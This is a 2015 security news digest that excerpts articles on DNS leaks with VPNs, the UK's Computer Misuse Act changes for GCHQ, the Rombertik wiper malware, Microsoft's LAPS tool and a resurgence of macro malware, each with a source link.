Find out if you are affected by DNS Leaks

May 19, 2015 – 4:38 AM

Whenever you use anonymity or privacy solutions to protect your Internet traffic from being snooped on or to bypass censorship and location-based restrictions, you need to make sure data about your actual location in the world or underlying system does not leak.

A basic recent example is WebRTC, a new technology that most modern browsers support. Websites and services may use WebRTC to find out about IP addresses of your computer when enabled even if you use a VPN service.

Computers use the DNS system to translate domain names to IP addresses. When you enter a domain name in the browser, DNS is used to look up the corresponding IP address to establish the connection.

The DNS server of the Internet Service Provider is used most of the time but it can be changed to third-party DNS providers like OpenDNS or Google DNS which promise faster look ups and may offer advanced features such as filtering of malicious sites.

DNS Leaks occur when  look ups are made using the DNS server of the ISP when you are connected to a virtual private network or other anonymity and privacy solutions.

Source:
http://www.ghacks.net/2015/05/19/find-out-if-you-are-affected-by-dns-leaks/

UK Government Rewrites Laws to Let GCHQ Hack Into Computers Legally

May 17, 2015 – 9:12 AM

The UK Government has been quietly changing the Anti-Hacking Laws quietly that exempt GCHQ, police, and other electronic intelligence agencies from criminal prosecution for hacking into computers and mobile phones and carrying out its controversial surveillance practices.

The details of the changes were disclosed at the Investigatory Powers Tribunal, which is currently hearing a challenge to the legality of computer hacking by UK law enforcement and its intelligence agencies.

About a year ago, a coalition of Internet service providers teamed up with Privacy International to take a legal action against GCHQ for its unlawful hacking activities.

However, the Government amended the Computer Misuse Act (CMA) two months ago to give GCHQ and other intelligence agencies more protection through a little-noticed addition to the Serious Crime Bill.

The change was introduced on June 6, just weeks after the complaint was filed by Privacy International that GCHQ had conducted computer hacking to gather intelligence that was unlawful under the CMA.

The bill that would allow GCHQ and other intelligence officers to hack without any criminal liability was passed into law on March 3, 2015 and became effective on 3rd of this month.

Source:
http://thehackernews.com/2015/05/anti-hacking-law.html

 

Super secretive malware wipes hard drive to prevent analysis

May 4, 2015 – 7:48 PM

Researchers have uncovered new malware that takes extraordinary measures to evade detection and analysis, including deleting all hard drive data and rendering a computer inoperable.

Rombertik, as the malware has been dubbed by researchers from Cisco Systems’ Talos Group, is a complex piece of software that indiscriminately collects everything a user does on the Web, presumably to obtain login credentials and other sensitive data. It gets installed when people click on attachments included in malicious e-mails. Talos researchers reverse engineered the software and found that behind the scenes Rombertik takes a variety of steps to evade analysis. It contains multiple levels of obfuscation and anti-analysis functions that make it hard for outsiders to peer into its inner workings. And in cases that main yfoye.exe component detects the malware is under the microscope of a security researcher or rival malware writer, Rombertik will self-destruct, taking along with it the contents of a victim’s hard drive.

Source:
http://arstechnica.com/security/2015/05/04/super-secretive-malware-wipes-hard-drive-to-prevent-analysis/

Local Administrator Password Solution (LAPS) Now Available

May 1, 2015 – 5:36 PM

Microsoft is offering the Local Administrator Password Solution (LAPS) that provides a solution to the issue of using a common local account with an identical password on every computer in a domain. LAPS resolves this issue by setting a different, random password for the common local administrator account on every computer in the domain. Domain administrators using the solution can determine which users, such as helpdesk administrators, are authorized to read passwords.

Compromised identical local account credentials could allow elevation of privilege if an attacker uses them to elevate from a local user/administrator to a domain/enterprise administrator. Local administrator credentials are needed for occasions when logon is required without domain access. In large environments, password management can become complex, leading to poor security practices, and such environments greatly increase the risk of a Pass-the-Hash (PtH) credential replay attack.

LAPS simplifies password management while helping customers implement recommended defenses against cyberattacks. In particular, the solution mitigates the risk of lateral escalation that results when customers use the same administrative local account and password combination on their computers.

Source:
https://technet.microsoft.com/en-us/library/security/3062591

Macro Malware Returns with a Vengeance, Infecting Half a Million PCs

April 30, 2015 – 9:07 PM

Macro malware, that tried-and-true document-borne attack vector, is back. Over the past few months, Microsoft has seen an increasing macro downloader trend that affects nearly 501,240 unique machines worldwide.

The majority of the macro-malware attacks have taken place in the United States and United Kingdom.

Macro malware gets into your PC as a spam email attachment. The user opens the document, enables the macro, thinking that the document needs it to function properly—unknowingly enabling the macro malware to run.

Success of course requires the email recipient to fall for a social engineering technique and open the attachment.

“The macro malware-laden documents that target email users through email spam are intentionally crafted to pique any person’s curiosity,” explained the Microsoft Malware Protection Center, in a blog. “With subjects that include sales invoices, federal tax payments, courier notifications, resumes and donation confirmations, users can be easily tricked to read the email and open the attachment without thinking twice.”

Essentially, macro downloaders serve as the gateway for other nasty malware to get in. “When a malicious macro code runs, it either downloads its final payload, or it downloads another payload courier in the form of a binary downloader,” Microsoft added. “After the macro malware is downloaded, the job is pretty much done. The torch is passed to either the final payload or the binary downloader.”

Source:
http://www.infosecurity-magazine.com/news/macro-malware-returns-with-a/